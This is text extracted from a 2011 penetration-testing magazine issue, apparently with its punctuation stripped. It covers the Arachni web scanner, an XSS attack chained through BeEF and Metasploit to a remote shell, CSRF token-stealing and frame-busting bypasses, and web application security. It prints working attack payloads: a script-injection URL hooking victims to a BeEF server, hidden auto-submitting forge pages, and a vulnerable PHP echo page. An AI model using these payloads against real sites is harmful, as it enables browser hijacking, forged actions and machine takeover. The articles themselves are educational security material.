Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
